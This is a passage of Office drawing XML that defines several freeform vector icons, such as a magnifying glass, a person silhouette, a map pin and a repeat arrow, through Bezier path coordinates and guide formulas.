                      <a:pt x="92" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="30"/>
                      <a:pt x="91" y="23"/>
                      <a:pt x="85" y="20"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="36" y="3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49"/>
                      <a:pt x="61" y="51"/>
                      <a:pt x="61" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="60"/>
                      <a:pt x="49" y="64"/>
                      <a:pt x="42" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="58"/>
                      <a:pt x="31" y="49"/>
                      <a:pt x="33" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="40"/>
                      <a:pt x="35" y="39"/>
                      <a:pt x="36" y="38"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="76" y="53"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="71"/>
                      <a:pt x="69" y="71"/>
                      <a:pt x="69" y="71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2"/>
                      <a:pt x="62" y="83"/>
                      <a:pt x="59" y="82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2" y="64"/>
                      <a:pt x="11" y="62"/>
                      <a:pt x="12" y="5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2" y="32"/>
                      <a:pt x="22" y="32"/>
                      <a:pt x="22" y="32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8" y="36"/>
                      <a:pt x="27" y="38"/>
                      <a:pt x="27" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="51"/>
                      <a:pt x="28" y="63"/>
                      <a:pt x="39" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="72"/>
                      <a:pt x="63" y="66"/>
                      <a:pt x="67" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="53"/>
                      <a:pt x="68" y="52"/>
                      <a:pt x="69" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="53"/>
                      <a:pt x="76" y="53"/>
                      <a:pt x="76" y="53"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="82" y="37"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="38"/>
                      <a:pt x="80" y="39"/>
                      <a:pt x="79" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="37"/>
                      <a:pt x="74" y="37"/>
                      <a:pt x="74" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="36"/>
                      <a:pt x="72" y="35"/>
                      <a:pt x="73" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="29"/>
                      <a:pt x="74" y="29"/>
                      <a:pt x="74" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="28"/>
                      <a:pt x="76" y="27"/>
                      <a:pt x="77" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="29"/>
                      <a:pt x="82" y="29"/>
                      <a:pt x="82" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="30"/>
                      <a:pt x="84" y="31"/>
                      <a:pt x="83" y="33"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="82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3" name="Freeform 99">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DEF8F0C-773B-4D16-9456-36709E21E2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93059" y="3628514"/>
                <a:ext cx="168330" cy="168330"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 44 w 53"/>
                  <a:gd name="T1" fmla="*/ 0 h 53"/>
                  <a:gd name="T2" fmla="*/ 9 w 53"/>
                  <a:gd name="T3" fmla="*/ 0 h 53"/>
                  <a:gd name="T4" fmla="*/ 0 w 53"/>
                  <a:gd name="T5" fmla="*/ 9 h 53"/>
                  <a:gd name="T6" fmla="*/ 0 w 53"/>
                  <a:gd name="T7" fmla="*/ 44 h 53"/>
                  <a:gd name="T8" fmla="*/ 9 w 53"/>
                  <a:gd name="T9" fmla="*/ 53 h 53"/>
                  <a:gd name="T10" fmla="*/ 44 w 53"/>
                  <a:gd name="T11" fmla="*/ 53 h 53"/>
                  <a:gd name="T12" fmla="*/ 53 w 53"/>
                  <a:gd name="T13" fmla="*/ 44 h 53"/>
                  <a:gd name="T14" fmla="*/ 53 w 53"/>
                  <a:gd name="T15" fmla="*/ 9 h 53"/>
                  <a:gd name="T16" fmla="*/ 44 w 53"/>
                  <a:gd name="T17" fmla="*/ 0 h 53"/>
                  <a:gd name="T18" fmla="*/ 20 w 53"/>
                  <a:gd name="T19" fmla="*/ 43 h 53"/>
                  <a:gd name="T20" fmla="*/ 13 w 53"/>
                  <a:gd name="T21" fmla="*/ 43 h 53"/>
                  <a:gd name="T22" fmla="*/ 13 w 53"/>
                  <a:gd name="T23" fmla="*/ 20 h 53"/>
                  <a:gd name="T24" fmla="*/ 20 w 53"/>
                  <a:gd name="T25" fmla="*/ 20 h 53"/>
                  <a:gd name="T26" fmla="*/ 20 w 53"/>
                  <a:gd name="T27" fmla="*/ 43 h 53"/>
                  <a:gd name="T28" fmla="*/ 17 w 53"/>
                  <a:gd name="T29" fmla="*/ 16 h 53"/>
                  <a:gd name="T30" fmla="*/ 13 w 53"/>
                  <a:gd name="T31" fmla="*/ 13 h 53"/>
                  <a:gd name="T32" fmla="*/ 17 w 53"/>
                  <a:gd name="T33" fmla="*/ 10 h 53"/>
                  <a:gd name="T34" fmla="*/ 20 w 53"/>
                  <a:gd name="T35" fmla="*/ 13 h 53"/>
                  <a:gd name="T36" fmla="*/ 17 w 53"/>
                  <a:gd name="T37" fmla="*/ 16 h 53"/>
                  <a:gd name="T38" fmla="*/ 43 w 53"/>
                  <a:gd name="T39" fmla="*/ 43 h 53"/>
                  <a:gd name="T40" fmla="*/ 37 w 53"/>
                  <a:gd name="T41" fmla="*/ 43 h 53"/>
                  <a:gd name="T42" fmla="*/ 37 w 53"/>
                  <a:gd name="T43" fmla="*/ 30 h 53"/>
                  <a:gd name="T44" fmla="*/ 33 w 53"/>
                  <a:gd name="T45" fmla="*/ 26 h 53"/>
                  <a:gd name="T46" fmla="*/ 30 w 53"/>
                  <a:gd name="T47" fmla="*/ 30 h 53"/>
                  <a:gd name="T48" fmla="*/ 30 w 53"/>
                  <a:gd name="T49" fmla="*/ 43 h 53"/>
                  <a:gd name="T50" fmla="*/ 23 w 53"/>
                  <a:gd name="T51" fmla="*/ 43 h 53"/>
                  <a:gd name="T52" fmla="*/ 23 w 53"/>
                  <a:gd name="T53" fmla="*/ 20 h 53"/>
                  <a:gd name="T54" fmla="*/ 30 w 53"/>
                  <a:gd name="T55" fmla="*/ 20 h 53"/>
                  <a:gd name="T56" fmla="*/ 30 w 53"/>
                  <a:gd name="T57" fmla="*/ 24 h 53"/>
                  <a:gd name="T58" fmla="*/ 36 w 53"/>
                  <a:gd name="T59" fmla="*/ 20 h 53"/>
                  <a:gd name="T60" fmla="*/ 43 w 53"/>
                  <a:gd name="T61" fmla="*/ 28 h 53"/>
                  <a:gd name="T62" fmla="*/ 43 w 53"/>
                  <a:gd name="T63" fmla="*/ 4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3" h="53">
                    <a:moveTo>
                      <a:pt x="44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3"/>
                      <a:pt x="9" y="53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9" y="53"/>
                      <a:pt x="53" y="49"/>
                      <a:pt x="53" y="44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4"/>
                      <a:pt x="49" y="0"/>
                      <a:pt x="44" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="20" y="43"/>
                    </a:move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lnTo>
                      <a:pt x="20" y="43"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="17" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="16"/>
                      <a:pt x="13" y="15"/>
                      <a:pt x="13" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="11"/>
                      <a:pt x="15" y="10"/>
                      <a:pt x="17" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="10"/>
                      <a:pt x="20" y="11"/>
                      <a:pt x="20" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="15"/>
                      <a:pt x="18" y="16"/>
                      <a:pt x="17" y="16"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="43" y="43"/>
                    </a:move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7" y="28"/>
                      <a:pt x="35" y="26"/>
                      <a:pt x="33" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="26"/>
                      <a:pt x="30" y="28"/>
                      <a:pt x="30" y="30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1" y="22"/>
                      <a:pt x="33" y="20"/>
                      <a:pt x="36" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="20"/>
                      <a:pt x="43" y="23"/>
                      <a:pt x="43" y="28"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="43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4" name="Freeform 100">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C45F9384-B042-440D-97BB-185E4219BF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46259" y="3395591"/>
                <a:ext cx="309258" cy="193775"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 49 w 158"/>
                  <a:gd name="T1" fmla="*/ 70 h 99"/>
                  <a:gd name="T2" fmla="*/ 49 w 158"/>
                  <a:gd name="T3" fmla="*/ 39 h 99"/>
                  <a:gd name="T4" fmla="*/ 78 w 158"/>
                  <a:gd name="T5" fmla="*/ 39 h 99"/>
                  <a:gd name="T6" fmla="*/ 39 w 158"/>
                  <a:gd name="T7" fmla="*/ 0 h 99"/>
                  <a:gd name="T8" fmla="*/ 0 w 158"/>
                  <a:gd name="T9" fmla="*/ 39 h 99"/>
                  <a:gd name="T10" fmla="*/ 29 w 158"/>
                  <a:gd name="T11" fmla="*/ 39 h 99"/>
                  <a:gd name="T12" fmla="*/ 29 w 158"/>
                  <a:gd name="T13" fmla="*/ 89 h 99"/>
                  <a:gd name="T14" fmla="*/ 88 w 158"/>
                  <a:gd name="T15" fmla="*/ 89 h 99"/>
                  <a:gd name="T16" fmla="*/ 68 w 158"/>
                  <a:gd name="T17" fmla="*/ 70 h 99"/>
                  <a:gd name="T18" fmla="*/ 49 w 158"/>
                  <a:gd name="T19" fmla="*/ 70 h 99"/>
                  <a:gd name="T20" fmla="*/ 129 w 158"/>
                  <a:gd name="T21" fmla="*/ 58 h 99"/>
                  <a:gd name="T22" fmla="*/ 129 w 158"/>
                  <a:gd name="T23" fmla="*/ 9 h 99"/>
                  <a:gd name="T24" fmla="*/ 68 w 158"/>
                  <a:gd name="T25" fmla="*/ 9 h 99"/>
                  <a:gd name="T26" fmla="*/ 88 w 158"/>
                  <a:gd name="T27" fmla="*/ 29 h 99"/>
                  <a:gd name="T28" fmla="*/ 107 w 158"/>
                  <a:gd name="T29" fmla="*/ 29 h 99"/>
                  <a:gd name="T30" fmla="*/ 107 w 158"/>
                  <a:gd name="T31" fmla="*/ 58 h 99"/>
                  <a:gd name="T32" fmla="*/ 78 w 158"/>
                  <a:gd name="T33" fmla="*/ 58 h 99"/>
                  <a:gd name="T34" fmla="*/ 119 w 158"/>
                  <a:gd name="T35" fmla="*/ 99 h 99"/>
                  <a:gd name="T36" fmla="*/ 158 w 158"/>
                  <a:gd name="T37" fmla="*/ 58 h 99"/>
                  <a:gd name="T38" fmla="*/ 129 w 158"/>
                  <a:gd name="T39" fmla="*/ 5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8" h="99">
                    <a:moveTo>
                      <a:pt x="49" y="70"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="49" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="70"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="129" y="58"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="129" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129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5" name="Freeform 101">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C663BD5-483E-4684-A7D5-16A5F062D8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10498" y="2367994"/>
                <a:ext cx="321002" cy="322959"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 96 w 100"/>
                  <a:gd name="T1" fmla="*/ 85 h 101"/>
                  <a:gd name="T2" fmla="*/ 73 w 100"/>
                  <a:gd name="T3" fmla="*/ 65 h 101"/>
                  <a:gd name="T4" fmla="*/ 66 w 100"/>
                  <a:gd name="T5" fmla="*/ 62 h 101"/>
                  <a:gd name="T6" fmla="*/ 74 w 100"/>
                  <a:gd name="T7" fmla="*/ 37 h 101"/>
                  <a:gd name="T8" fmla="*/ 37 w 100"/>
                  <a:gd name="T9" fmla="*/ 0 h 101"/>
                  <a:gd name="T10" fmla="*/ 0 w 100"/>
                  <a:gd name="T11" fmla="*/ 37 h 101"/>
                  <a:gd name="T12" fmla="*/ 37 w 100"/>
                  <a:gd name="T13" fmla="*/ 75 h 101"/>
                  <a:gd name="T14" fmla="*/ 61 w 100"/>
                  <a:gd name="T15" fmla="*/ 66 h 101"/>
                  <a:gd name="T16" fmla="*/ 64 w 100"/>
                  <a:gd name="T17" fmla="*/ 73 h 101"/>
                  <a:gd name="T18" fmla="*/ 84 w 100"/>
                  <a:gd name="T19" fmla="*/ 96 h 101"/>
                  <a:gd name="T20" fmla="*/ 97 w 100"/>
                  <a:gd name="T21" fmla="*/ 97 h 101"/>
                  <a:gd name="T22" fmla="*/ 96 w 100"/>
                  <a:gd name="T23" fmla="*/ 85 h 101"/>
                  <a:gd name="T24" fmla="*/ 37 w 100"/>
                  <a:gd name="T25" fmla="*/ 62 h 101"/>
                  <a:gd name="T26" fmla="*/ 12 w 100"/>
                  <a:gd name="T27" fmla="*/ 37 h 101"/>
                  <a:gd name="T28" fmla="*/ 37 w 100"/>
                  <a:gd name="T29" fmla="*/ 12 h 101"/>
                  <a:gd name="T30" fmla="*/ 62 w 100"/>
                  <a:gd name="T31" fmla="*/ 37 h 101"/>
                  <a:gd name="T32" fmla="*/ 37 w 100"/>
                  <a:gd name="T33" fmla="*/ 6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101">
                    <a:moveTo>
                      <a:pt x="96" y="85"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="65"/>
                      <a:pt x="73" y="65"/>
                      <a:pt x="73" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="62"/>
                      <a:pt x="68" y="61"/>
                      <a:pt x="66" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="55"/>
                      <a:pt x="74" y="47"/>
                      <a:pt x="74" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="17"/>
                      <a:pt x="58" y="0"/>
                      <a:pt x="37" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="0"/>
                      <a:pt x="0" y="17"/>
                      <a:pt x="0" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="58"/>
                      <a:pt x="17" y="75"/>
                      <a:pt x="37" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="75"/>
                      <a:pt x="55" y="71"/>
                      <a:pt x="61" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="68"/>
                      <a:pt x="62" y="70"/>
                      <a:pt x="64" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="96"/>
                      <a:pt x="84" y="96"/>
                      <a:pt x="84" y="96"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="100"/>
                      <a:pt x="94" y="101"/>
                      <a:pt x="97" y="97"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="94"/>
                      <a:pt x="100" y="88"/>
                      <a:pt x="96" y="85"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="37" y="62"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="62"/>
                      <a:pt x="12" y="51"/>
                      <a:pt x="12" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="24"/>
                      <a:pt x="23" y="12"/>
                      <a:pt x="37" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="12"/>
                      <a:pt x="62" y="24"/>
                      <a:pt x="62" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="51"/>
                      <a:pt x="51" y="62"/>
                      <a:pt x="37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6" name="Freeform 102">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DFC4838-8123-4C18-8CB5-6F4E2F84B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81667" y="2328848"/>
                <a:ext cx="395380" cy="383636"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 78 w 124"/>
                  <a:gd name="T1" fmla="*/ 84 h 120"/>
                  <a:gd name="T2" fmla="*/ 75 w 124"/>
                  <a:gd name="T3" fmla="*/ 75 h 120"/>
                  <a:gd name="T4" fmla="*/ 86 w 124"/>
                  <a:gd name="T5" fmla="*/ 54 h 120"/>
                  <a:gd name="T6" fmla="*/ 89 w 124"/>
                  <a:gd name="T7" fmla="*/ 37 h 120"/>
                  <a:gd name="T8" fmla="*/ 62 w 124"/>
                  <a:gd name="T9" fmla="*/ 0 h 120"/>
                  <a:gd name="T10" fmla="*/ 36 w 124"/>
                  <a:gd name="T11" fmla="*/ 37 h 120"/>
                  <a:gd name="T12" fmla="*/ 39 w 124"/>
                  <a:gd name="T13" fmla="*/ 54 h 120"/>
                  <a:gd name="T14" fmla="*/ 50 w 124"/>
                  <a:gd name="T15" fmla="*/ 75 h 120"/>
                  <a:gd name="T16" fmla="*/ 47 w 124"/>
                  <a:gd name="T17" fmla="*/ 84 h 120"/>
                  <a:gd name="T18" fmla="*/ 0 w 124"/>
                  <a:gd name="T19" fmla="*/ 120 h 120"/>
                  <a:gd name="T20" fmla="*/ 62 w 124"/>
                  <a:gd name="T21" fmla="*/ 120 h 120"/>
                  <a:gd name="T22" fmla="*/ 124 w 124"/>
                  <a:gd name="T23" fmla="*/ 120 h 120"/>
                  <a:gd name="T24" fmla="*/ 78 w 124"/>
                  <a:gd name="T25" fmla="*/ 8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4" h="120">
                    <a:moveTo>
                      <a:pt x="78" y="84"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="84"/>
                      <a:pt x="75" y="75"/>
                      <a:pt x="75" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="75"/>
                      <a:pt x="84" y="66"/>
                      <a:pt x="86" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="54"/>
                      <a:pt x="94" y="42"/>
                      <a:pt x="89" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="32"/>
                      <a:pt x="96" y="0"/>
                      <a:pt x="62" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="0"/>
                      <a:pt x="36" y="32"/>
                      <a:pt x="36" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="42"/>
                      <a:pt x="34" y="54"/>
                      <a:pt x="39" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="66"/>
                      <a:pt x="50" y="75"/>
                      <a:pt x="50" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="75"/>
                      <a:pt x="50" y="84"/>
                      <a:pt x="47" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="86"/>
                      <a:pt x="0" y="102"/>
                      <a:pt x="0" y="120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124" y="120"/>
                      <a:pt x="124" y="120"/>
                      <a:pt x="124" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="102"/>
                      <a:pt x="88" y="86"/>
                      <a:pt x="78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7" name="Freeform 103">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF57EB69-ECBB-40C0-B437-50114D9EE3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658002" y="5303987"/>
                <a:ext cx="131142" cy="207477"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 21 w 41"/>
                  <a:gd name="T1" fmla="*/ 0 h 65"/>
                  <a:gd name="T2" fmla="*/ 0 w 41"/>
                  <a:gd name="T3" fmla="*/ 20 h 65"/>
                  <a:gd name="T4" fmla="*/ 21 w 41"/>
                  <a:gd name="T5" fmla="*/ 65 h 65"/>
                  <a:gd name="T6" fmla="*/ 41 w 41"/>
                  <a:gd name="T7" fmla="*/ 20 h 65"/>
                  <a:gd name="T8" fmla="*/ 21 w 41"/>
                  <a:gd name="T9" fmla="*/ 0 h 65"/>
                  <a:gd name="T10" fmla="*/ 21 w 41"/>
                  <a:gd name="T11" fmla="*/ 33 h 65"/>
                  <a:gd name="T12" fmla="*/ 8 w 41"/>
                  <a:gd name="T13" fmla="*/ 20 h 65"/>
                  <a:gd name="T14" fmla="*/ 21 w 41"/>
                  <a:gd name="T15" fmla="*/ 8 h 65"/>
                  <a:gd name="T16" fmla="*/ 33 w 41"/>
                  <a:gd name="T17" fmla="*/ 20 h 65"/>
                  <a:gd name="T18" fmla="*/ 21 w 41"/>
                  <a:gd name="T19" fmla="*/ 33 h 65"/>
                  <a:gd name="T20" fmla="*/ 13 w 41"/>
                  <a:gd name="T21" fmla="*/ 20 h 65"/>
                  <a:gd name="T22" fmla="*/ 21 w 41"/>
                  <a:gd name="T23" fmla="*/ 28 h 65"/>
                  <a:gd name="T24" fmla="*/ 29 w 41"/>
                  <a:gd name="T25" fmla="*/ 20 h 65"/>
                  <a:gd name="T26" fmla="*/ 21 w 41"/>
                  <a:gd name="T27" fmla="*/ 12 h 65"/>
                  <a:gd name="T28" fmla="*/ 13 w 41"/>
                  <a:gd name="T29" fmla="*/ 2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" h="65">
                    <a:moveTo>
                      <a:pt x="21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41"/>
                      <a:pt x="21" y="65"/>
                      <a:pt x="21" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="65"/>
                      <a:pt x="41" y="41"/>
                      <a:pt x="41" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="9"/>
                      <a:pt x="32" y="0"/>
                      <a:pt x="21" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="21" y="33"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="33"/>
                      <a:pt x="8" y="27"/>
                      <a:pt x="8" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="13"/>
                      <a:pt x="14" y="8"/>
                      <a:pt x="21" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="8"/>
                      <a:pt x="33" y="13"/>
                      <a:pt x="33" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="27"/>
                      <a:pt x="28" y="33"/>
                      <a:pt x="21" y="33"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="13" y="20"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="25"/>
                      <a:pt x="16" y="28"/>
                      <a:pt x="21" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="28"/>
                      <a:pt x="29" y="25"/>
                      <a:pt x="29" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="16"/>
                      <a:pt x="25" y="12"/>
                      <a:pt x="21" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="12"/>
                      <a:pt x="13" y="16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69" name="Freeform 104">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBBF0EC6-A1B0-4C4D-88C5-5411396EB9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15118" y="5527123"/>
                <a:ext cx="203562" cy="275983"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 58 w 64"/>
                  <a:gd name="T1" fmla="*/ 9 h 86"/>
                  <a:gd name="T2" fmla="*/ 24 w 64"/>
                  <a:gd name="T3" fmla="*/ 1 h 86"/>
                  <a:gd name="T4" fmla="*/ 16 w 64"/>
                  <a:gd name="T5" fmla="*/ 7 h 86"/>
                  <a:gd name="T6" fmla="*/ 1 w 64"/>
                  <a:gd name="T7" fmla="*/ 68 h 86"/>
                  <a:gd name="T8" fmla="*/ 6 w 64"/>
                  <a:gd name="T9" fmla="*/ 77 h 86"/>
                  <a:gd name="T10" fmla="*/ 39 w 64"/>
                  <a:gd name="T11" fmla="*/ 85 h 86"/>
                  <a:gd name="T12" fmla="*/ 48 w 64"/>
                  <a:gd name="T13" fmla="*/ 80 h 86"/>
                  <a:gd name="T14" fmla="*/ 63 w 64"/>
                  <a:gd name="T15" fmla="*/ 18 h 86"/>
                  <a:gd name="T16" fmla="*/ 58 w 64"/>
                  <a:gd name="T17" fmla="*/ 9 h 86"/>
                  <a:gd name="T18" fmla="*/ 31 w 64"/>
                  <a:gd name="T19" fmla="*/ 7 h 86"/>
                  <a:gd name="T20" fmla="*/ 50 w 64"/>
                  <a:gd name="T21" fmla="*/ 11 h 86"/>
                  <a:gd name="T22" fmla="*/ 49 w 64"/>
                  <a:gd name="T23" fmla="*/ 14 h 86"/>
                  <a:gd name="T24" fmla="*/ 30 w 64"/>
                  <a:gd name="T25" fmla="*/ 9 h 86"/>
                  <a:gd name="T26" fmla="*/ 31 w 64"/>
                  <a:gd name="T27" fmla="*/ 7 h 86"/>
                  <a:gd name="T28" fmla="*/ 24 w 64"/>
                  <a:gd name="T29" fmla="*/ 76 h 86"/>
                  <a:gd name="T30" fmla="*/ 20 w 64"/>
                  <a:gd name="T31" fmla="*/ 71 h 86"/>
                  <a:gd name="T32" fmla="*/ 26 w 64"/>
                  <a:gd name="T33" fmla="*/ 67 h 86"/>
                  <a:gd name="T34" fmla="*/ 30 w 64"/>
                  <a:gd name="T35" fmla="*/ 73 h 86"/>
                  <a:gd name="T36" fmla="*/ 24 w 64"/>
                  <a:gd name="T37" fmla="*/ 76 h 86"/>
                  <a:gd name="T38" fmla="*/ 46 w 64"/>
                  <a:gd name="T39" fmla="*/ 67 h 86"/>
                  <a:gd name="T40" fmla="*/ 8 w 64"/>
                  <a:gd name="T41" fmla="*/ 58 h 86"/>
                  <a:gd name="T42" fmla="*/ 20 w 64"/>
                  <a:gd name="T43" fmla="*/ 10 h 86"/>
                  <a:gd name="T44" fmla="*/ 58 w 64"/>
                  <a:gd name="T45" fmla="*/ 19 h 86"/>
                  <a:gd name="T46" fmla="*/ 46 w 64"/>
                  <a:gd name="T47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4" h="86">
                    <a:moveTo>
                      <a:pt x="58" y="9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="1"/>
                      <a:pt x="24" y="1"/>
                      <a:pt x="24" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="0"/>
                      <a:pt x="17" y="3"/>
